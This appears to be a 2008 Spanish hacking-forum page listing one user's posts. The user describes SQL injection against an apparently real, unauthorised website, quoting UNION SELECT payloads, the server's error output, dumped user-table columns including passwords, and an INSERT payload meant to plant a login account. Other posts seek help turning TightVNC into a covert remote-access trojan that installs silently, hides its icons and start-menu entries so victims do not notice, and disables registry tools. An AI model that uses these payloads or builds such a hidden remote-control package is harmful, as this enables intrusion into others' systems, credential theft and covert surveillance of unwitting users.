elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5
31  Seguridad Informática / Nivel Web / Re: Como seguir Con la inyeccion SQL en: 26 Agosto 2008, 23:42 pm
Ahi esta una ya solocione en vez  de colocarlo asi
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Lo coloque asi
'union select  1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, @@servername --
y me dio su hermosoo Error
Citar
Error: ERROR [22018] [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'WSMSSQL02..................' to data type int. 
Si alguien sabe A que se refiere con el error donde me dice que esta duplicando el dato en la clave primaria... coloco otra vez
Citar
error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.
Ahora vengo de la facu y sigo intentandoo..
Saludos
Grcias por la ayuda tambienn
32  Seguridad Informática / Nivel Web / Como seguir Con la inyeccion SQL en: 26 Agosto 2008, 17:24 pm
Hola que tal como va!! Encontre un pagina donde pude hacerles una inyecciones de SQL y me dio el nombre de la tabla mas Todas las culomnas..  les muestro algunas

dbo.tblUser.User_ID
dbo.tblUser.User_Code
dbo.tblUser.User_Password
dbo.tblUser.User_Permissions
dbo.tblUser.User_Number
dbo.tblUser.User_Firstname
dbo.tblUser.User_Surname
dbo.tblUser.User_TitleBefore
dbo.tblUser.User_TitleAfter
                  .
                  .

Ahora cuando llego a tratar de sacarle la version por ejemplo con esto:
'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Me tira este error...
Citar
Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.
Cuando me tendrai q dar algo asi..
Citar
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2221.00 (Intel X86) Feb 9 2007 17:30:38 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
Lo mismo pasa si pongo por ejemplo
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
No se a lo qiue se refiere con ese error...
Despues tambien como tengo las columnas intente agregar un registro con nombre de usuario y pass.. para loguearme puse
';INSERT INTO dbo.tblUser (User_Code, User_password) VALUES ('magnobalt', 'magno') --
Y obtengo este error:
Citar
error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.

Entiendo Como si estoy queriendo ingresar un dato duplicado en la clave primaria... Pero Intente con numeros altos al lado de mi user y me sigue arrojando el mismo error...Pero creo q la columna user no creo q sea la clave primaria...alguna ayuda!!
Un abrazo
Si alguien me puede dar una mano!! Gracias
33  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 25 Agosto 2008, 21:22 pm
Hola Para algunos que esten interesado en troyanizar el VNC, hice un tutorial para que le peguen un vistazo, que se encuentra http://magnobalt.iespana.es/..
Cualquier error me lo avisan..
Saludos!!
34  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 14 Agosto 2008, 17:43 pm
Citar
Alguien lo tiene trabajando porque no encuentro el VNC 3 el que tengo es el 4, por favor subanlo pq trate de bajar los de aqui y ya no existen, gracias...

Hola Hole_System, yo lo troyanize con el TightVNC q podes bajarte de http://www.tightvnc.com/download.html.. espero te sirva

Saludos..
35  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 26 Julio 2008, 06:42 am
Ahi esta solucionadoo... me colgue con el acento en el menu.. :rolleyes: :rolleyes:
Ahora alguien sabe como puedo sacar los iconos grandes que aparecen cuando apretas inicio..Por q resulta q tambien crea uno ahi (bastante pesado creando iconos el vnc.. )

Gracias Novlucker...
Un abrazo
36  Seguridad Informática / Hacking / Re: Troyanizando VNC - Control Remoto Invisible en: 26 Julio 2008, 03:04 am
holaa estoy teniendo un problemaa.. he ttroyanizado el TightVNC.. esta casi invisible, se instala silenciosamente, importa los .reg, esconde icono en la barra de tarea..
Pero me surgio un problemita.. Resulta q al intalarse por default el vnc deja una carpeta en el menu inicio, entonces lo quiero Hacer es eliminar el arbol completo del directorio con el comando RD.. pèro me dice esto:

rd /S /Q "%HOMEDRIVE%\DOCUME~1\All Users\Menú Inicio\Programas\tightvnc"

El sistema no puede hallar la ruta especificada.

lo intente asi tmb

rd /S /Q "C:\DOCUME~1\All Users\Menú Inicio\Programas\tightvnc"

y sin las comillas tmb lo intente (ahi se arma peor los errores) ... alguien me puede decir en q estoy errando con el comando...

gracias... 
37  Programación / Scripting / Re: Batch y Registro de Windows - Juguemos!!! en: 25 Julio 2008, 02:27 am
Citar
Ahora que leo, No entendi bien lo que quieres hacer. ¿Eliminar todo los iconos de Inicio>Todos los programas?, solo hace clic derecho y pones eliminar. O te vas a
C:\Documents and Settings\All Users\Menú Inicio\ o en lugar de All Users, ubicas el usuario y eliminas las carpetas.... :-\ :-\ :-\, no se si eso es lo que qures hacer...

Si lo del menu inicio ya solucione... No encuentro como esconderr el icono de la barra de tray lado del reloj.. de tdas formas gracias voy a seguir buscandoo...
un abrazoo
38  Programación / Scripting / Re: Batch y Registro de Windows - Juguemos!!! en: 22 Julio 2008, 05:46 am
Hola Como le va gente a todos!! Gracias a este Post y a otros mas q andube espiando sobre batch pude aprender bastante!!
Estoy terminando un programilla  q oculta al vnc, lo instala silenciosamente y deja configurado para q se pueda tener  accesso..
Ahora lo hice con el joinner que conoci gracias a un post Lukhardy , q es el Quick Batch File Compiler, (por cierto muy copado esta).. y otras datos mas q fui aprendiendo..
Ahora tengo 3 problema q seguro alguien sabe si me puede ayudar...
1)Como Puedo sacar los iconos  que aparecen al entrar a inicio, osea los grandes?
2) nesesito sacar el todo el conjunto de icono q esta cuando se entra incio>todos   losprogramas.. por ejemplo eliminar inicio>programas>microsoft office (asi  saco de la lista para q el usuario ni se de cuenta q exista algo d  ese programa)
3) y la ultima.. es sacar el icono del  VNC en la barra de tray (al lado del relojito), osea ocultarlo seria por q nesesito q siga corriendo el servicio VNC Server

Graciass

39  Programación / Scripting / Re: Batch y Registro de Windows - Juguemos!!! en: 20 Julio 2008, 22:04 pm
Hola como estas Lukhardy andube mirando todos tus post y estan muy buenos y me saco una duda q te iba a preguntar sobre algun joiner y vi el que realizaste sobre Manual: JOINER con Quick Batch File Compiler asi q me lo termine bajando.. ahh lo q si en el link q das q es http://414141.iespana.es/ no esta!!
Bueno gracias por responder la duda q tenia sobre como agregar un .reg de forma silenciosa tengo dos consultas 1) me podrias decir q hace especificamente esta linea

Citar
Echo "disableregistrytools"=dword:00000001>>registros1.reg

2)Cual es el comando q realiza una pausa asignandole segundos.. q se comporte como el comnado SLEEP de GNU/LINUX
Graciass.. un abrazoo
40  Programación / Scripting / Re: Batch y Registro de Windows - Juguemos!!! en: 20 Julio 2008, 05:51 am
Disculpenn encontre la forma en realidad lo q tengo q hacer es exportar estas dor partes
    *  HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3
    * HKEY_CURRENT_USER\Software\ORL\WinVNC3
ahora con esas dos exportaciones creo dos archivos .reg
hay una forma de agregar los archivos .reg al batch.. y realizar la inserccion de un modo silencioso??
Páginas: 1 2 3 [4] 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines